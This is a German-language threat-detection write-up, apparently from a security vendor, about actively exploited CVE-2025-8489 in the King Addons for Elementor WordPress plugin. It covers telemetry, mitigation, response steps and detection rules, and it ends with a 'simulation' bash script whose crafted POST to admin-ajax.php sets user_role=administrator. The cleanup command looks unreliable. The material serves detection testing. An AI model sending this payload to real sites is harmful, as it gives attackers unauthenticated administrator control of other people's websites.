Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Eine kritische nicht authentifizierte Schwachstelle zur Privilegienerweiterung (CVE-2025-8489) im King Addons für Elementor WordPress-Plugin ermöglicht es Angreifern, neue Benutzer mit Administratorrechten zu registrieren. Der Fehler wird seit dem 31. Oktober 2025 aktiv ausgenutzt, wobei Wordfence Zehntausende von Versuchen blockiert hat. Angreifer nutzen das Problem über manipulierte POST-Anfragen, die an den admin-ajax.php-Endpunkt gesendet werden. Versionen 24.12.92 bis 51.1.14 sind betroffen, mit einem Fix in Version 51.1.35 verfügbar.
Untersuchung
Wordfence-Telemetrie zeichnete mehr als 48.400 Exploit-Versuche auf, mit einem bemerkenswerten Anstieg am 9.–10. November 2025. Die aktivste IPv6-Quelladresse war 2602:fa59:3:424::1. Bösartige Nutzlasten verwenden HTTP POST-Daten, die den Parameter user_role während des Registrierungsablaufs auf Administrator setzen. Es wurde keine zusätzliche Malware-Bereitstellung beobachtet außer der Erstellung von gefälschten Admin-Konten.
Abschwächung
Aktualisieren Sie King Addons für Elementor auf Version 51.1.35 oder neuer. Aktivieren Sie die Wordfence-Firewall-Schutzmaßnahmen, die am 4. August 2025 (Premium) und am 3. September 2025 (kostenlos) eingeführt wurden. Überprüfen Sie die WordPress-Benutzerlisten auf unerwartete Administrator-Konten und überprüfen Sie kontinuierlich die Protokolle auf das verdächtige POST-Muster.
Reaktion
Lösen Sie Warnungen beim POST-Verkehr zu /wp-admin/admin-ajax.php aus, der user_role=administrator enthält. Sperren Sie missbräuchliche IP-Adressen, wobei besonderes Augenmerk auf die hervorgehobene IPv6-Quelle gelegt wird. Führen Sie Kontohygieneüberprüfungen durch und entfernen Sie nicht autorisierte Admin-Benutzer. Setzen Sie hostbasierte IDS-Signaturen ein, die auf die beobachtete Anfragelstruktur abgestimmt sind.
mermaid graph TB %% Class definitions Section classDef technique fill:#ffcc00 %% Node definitions tech_exploit_public_facing[„<b>Technik</b> – <b>T1190 Ausnutzung öffentlicher Anwendungen</b><br />Angreifer nutzen eine öffentliche Anwendung aus, um initialen Zugriff zu erhalten.“] class tech_exploit_public_facing technique tech_exploitation_priv_esc[„<b>Technik</b> – <b>T1068 Ausnutzung für Privilegienerweiterung</b><br />Angreifer nutzen eine Software-Schwachstelle aus, um ihre Privilegien im System zu erhöhen.“] class tech_exploitation_priv_esc technique tech_account_manipulation[„<b>Technik</b> – <b>T1098 Kontomanipulation</b><br />Angreifer erstellen, ändern oder löschen Konten, um ihre Ziele zu erreichen.“] class tech_account_manipulation technique tech_valid_accounts[„<b>Technik</b> – <b>T1078 Gültige Konten</b><br />Angreifer erlangen und verwenden legitime Anmeldedaten, um auf Konten zuzugreifen.“] class tech_valid_accounts technique %% Edge connections showing attack flow tech_exploit_public_facing u002du002d>|leads_to| tech_exploitation_priv_esc tech_exploitation_priv_esc u002du002d>|leads_to| tech_account_manipulation tech_account_manipulation u002du002d>|leads_to| tech_valid_accounts
Angriffsfluss
Erkennungen
Ausnutzung der Privilegienerweiterung in King Addons für Elementor [Webserver]
Ansehen
IOCs (SourceIP) zur Erkennung: Angreifer nutzen kritische Schwachstelle im King Addons für Elementor-Plugin aktiv aus
Ansehen
IOCs (DestinationIP) zur Erkennung: Angreifer nutzen kritische Schwachstelle im King Addons für Elementor-Plugin aktiv aus
Ansehen
Möglicher CVE-2025-8489 (WordPress King Addons Privilegienerweiterung) Ausnutzungsversuch (über Webserver)
Ansehen
Simulationsausführung
Voraussetzung: Der Telemetrie- und Basislinien-Pre-Flight-Check muss bestanden haben.
-
Angriffserzählung & Befehle:
Ein Angreifer entdeckt CVE‑2025‑8489 im King Addons für Elementor-Plugin. Er erstellt eine POST-Anfrage anadmin-ajax.phpdie denaction=king_addons_user_registerParameter (vom Plugin erforderlich) and erzwingt die Neueinstellung der Benutzerrolle alsAdministratorüberuser_role=administrator. Durch das direkte Senden dieser Anfrage an den verwundbaren Endpunkt erhält der Angreifer ein privilegiertes WordPress-Konto, ohne vorherige Authentifizierung zu benötigen. Die Nutzlast ist URL-kodiert, um einen realistischen Web-Client nachzuahmen. -
Regressionstest-Skript:
#!/usr/bin/env bash # Exploit-Skript für King Addons für Elementor Privilegienerweiterung (CVE‑2025‑8489) TARGET="http://webserver.example.com" ENDPOINT="/wp-admin/admin-ajax.php" # Manipulierte POST-Daten (URL‑kodiert) POST_DATA="action=king_addons_user_register&user_login=eviladmin&user_email=evil@example.com&user_pass=P@ssw0rd!&user_role=administrator" echo "[*] Sende Exploit-Nutzlast..." curl -s -o /dev/null -w "%{http_code}" -X POST "${TARGET}${ENDPOINT}" -H "Content-Type: application/x-www-form-urlencoded" --data "${POST_DATA}" echo -e "n[+] Exploit gesendet. Überprüfen Sie das SIEM auf den generierten Alarm." -
Bereinigungskommandos:
# Entfernen Sie den während des Tests erstellten bösartigen Benutzer curl -X POST "http://webserver.example.com/wp-admin/admin-ajax.php" -d "action=delete_user&user_id=$(curl -s "http://webserver.example.com/wp-json/wp/v2/users?search=eviladmin" | jq -r '.[0].id')" echo "[*] Bereinigung abgeschlossen."